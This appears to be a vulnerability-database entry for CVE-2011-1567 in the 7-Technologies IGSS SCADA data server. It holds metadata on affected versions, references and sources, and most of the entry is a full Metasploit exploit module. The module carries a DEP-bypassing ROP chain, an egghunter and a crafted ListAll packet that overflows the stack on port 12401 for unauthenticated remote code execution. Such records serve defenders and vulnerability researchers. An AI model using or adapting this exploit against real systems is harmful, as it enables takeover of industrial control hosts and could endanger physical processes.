ID
VAR-E-201103-0088
CVE
| cve_id: | CVE-2011-1567 | Trust: 2.4 |
| cve_id: | CVE-2011-1566 | Trust: 0.8 |
| cve_id: | CVE-2011-1568 | Trust: 0.3 |
| cve_id: | CVE-2011-1565 | Trust: 0.3 |
EDB ID
17300
TITLE
7-Technologies IGSS 9.00.00 b11063 - 'IGSSdataServer.exe' Remote Stack Overflow (Metasploit) - Windows remote Exploit
Trust: 0.6
DESCRIPTION
7-Technologies IGSS 9.00.00 b11063 - 'IGSSdataServer.exe' Remote Stack Overflow (Metasploit). CVE-2011-1567 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | 7 | model: | igss b11063 | scope: | eq | version: | 9.00.00 | Trust: 1.0 |
| vendor: | 7 | model: | igss b11063 | scope: | lte | version: | <=9.00.00 | Trust: 0.6 |
| vendor: | interactive | model: | graphical scada system remote | scope: | - | version: | - | Trust: 0.5 |
| vendor: | 7 | model: | igss b11063 igssdataserver.exe | scope: | lte | version: | <=v9.00.00 | Trust: 0.5 |
| vendor: | 7 | model: | interactive graphical scada system | scope: | eq | version: | 9 | Trust: 0.3 |
| vendor: | 7 | model: | interactive graphical scada system | scope: | eq | version: | 8 | Trust: 0.3 |
EXPLOIT
##
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::Tcp
def initialize(info={})
super(update_info(info,
'Name' => "7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow",
'Description' => %q{
This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies
IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application
fails to do proper bounds checking before copying data into a small buffer on the stack.
This causes a buffer overflow and allows to overwrite a structured exception handling record
on the stack, allowing for unauthenticated remote code execution.
},
'License' => MSF_LICENSE,
'Version' => '$Revision: 12639 $',
'Author' =>
[
'Luigi Auriemma', #Initial discovery, poc
'Lincoln', #Metasploit
'corelanc0d3r', #Rop exploit, combined XP SP3 & 2003 Server
'sinn3r', #Serious Msf style policing
],
'References' =>
[
['CVE', '2011-1567'],
['OSVDB', ''],
['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => 'process',
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',
{
'Ret' => 0x1b77ca8c, #dao360.dll pivot 1388 bytes
'Offset' => 500
}
],
],
'Privileged' => false,
'DisclosureDate' => "March 24 2011",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(12401)
], self.class)
end
def junk
return rand_text(4).unpack("L")[0].to_i
end
def exploit
eggoptions =
{
:checksum => false,
:eggtag => 'w00t',
:depmethod => 'virtualprotect',
:depreg => 'esi'
}
badchars = "\x00"
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
#dao360.dll - pvefindaddr rop 'n roll
rop_chain = [
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b72f174, # POP EAX # RETN 08
0xA1A10101,
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08
junk,
junk,
0x1b73a55c, # XCHG EAX,EBX # RETN
junk,
junk,
0x1b724004, # pop ebp
0x1b72f15f, # &push esp # retn 8
0x1b72f040, # POP ECX # RETN
0x1B78F010, # writeable
0x1b7681c2, # xor eax,eax # retn
0x1b72495c, # add al,40 # mov [esi+4],eax # pop esi # retn 4
0x41414141,
0x1b76a883, # XCHG EAX,ESI # RETN 00
junk,
0x1b7785c1, # XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C
junk,
junk,
0x1b78535c, # ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10
junk,
junk,
junk,
junk,
0x1b7280b4, # POP EDI # XOR EAX,EAX # POP ESI # RETN
junk,
junk,
junk,
junk,
0x1b7681c4, # rop nop (edi)
0x90909090, # esi -> eax -> nop
0x1b72f174, # POP EAX # RETN 08
0xA1F50214, # offset to &VirtualProtect
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08
junk,
junk,
0x1b73f3bd, # MOV EAX,DWORD PTR DS:[EAX] # RETN
junk,
junk,
0x1b76a883, # XCHG EAX,ESI # RETN 00
0x1b72f040, # pop ecx
0x1B78F010, # writeable (ecx)
0x1b764716, # PUSHAD # RETN
].pack('V*')
header = "\x00\x04\x01\x00\x34\x12\x0D\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
header << rand_text(14)
sploit = rop_chain
sploit << "\x90" * 10
sploit << hunter
sploit << rand_text(target['Offset'] - (sploit.length))
sploit << [target.ret].pack('V')
sploit << egg
sploit << rand_text(2000)
connect
print_status("Sending request...")
sock.put(header + sploit)
handler
disconnect
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'IGSSdataServer.exe' Remote Stack Overflow (Metasploit)
Trust: 1.0
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | arbitrary | Trust: 0.5 |
| tag: | remote | Trust: 0.5 |
| tag: | overflow | Trust: 0.5 |
| tag: | code execution | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2011-1567 | Trust: 2.4 |
| db: | EXPLOIT-DB | id: | 17300 | Trust: 1.6 |
| db: | NVD | id: | CVE-2011-1566 | Trust: 0.8 |
| db: | EDBNET | id: | 39919 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 123709 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 101465 | Trust: 0.5 |
| db: | NVD | id: | CVE-2011-1568 | Trust: 0.3 |
| db: | NVD | id: | CVE-2011-1565 | Trust: 0.3 |
| db: | BID | id: | 46936 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-1567 | Trust: 2.1 |
| url: | https://www.exploit-db.com/exploits/17300/ | Trust: 0.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-1566 | Trust: 0.5 |
| url: | http://aluigi.org/adv/igss_4-adv.txt | Trust: 0.3 |
| url: | http://aluigi.org/adv/igss_8-adv.txt | Trust: 0.3 |
| url: | http://aluigi.org/adv/igss_5-adv.txt | Trust: 0.3 |
| url: | http://aluigi.org/adv/igss_2-adv.txt | Trust: 0.3 |
| url: | http://aluigi.org/adv/igss_7-adv.txt | Trust: 0.3 |
| url: | http://aluigi.org/adv/igss_1-adv.txt | Trust: 0.3 |
| url: | http://aluigi.org/adv/igss_3-adv.txt | Trust: 0.3 |
| url: | http://www.igss.com/ | Trust: 0.3 |
| url: | http://aluigi.org/adv/igss_6-adv.txt | Trust: 0.3 |
SOURCES
| db: | BID | id: | 46936 |
| db: | PACKETSTORM | id: | 123709 |
| db: | PACKETSTORM | id: | 101465 |
| db: | EXPLOIT-DB | id: | 17300 |
| db: | EDBNET | id: | 39919 |
LAST UPDATE DATE
2022-07-27T09:19:19.881000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 46936 | date: | 2015-04-13T21:05:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 46936 | date: | 2011-03-21T00:00:00 |
| db: | PACKETSTORM | id: | 123709 | date: | 2013-10-22T01:43:26 |
| db: | PACKETSTORM | id: | 101465 | date: | 2011-05-16T21:53:30 |
| db: | EXPLOIT-DB | id: | 17300 | date: | 2011-05-16T00:00:00 |
| db: | EDBNET | id: | 39919 | date: | 2011-05-16T00:00:00 |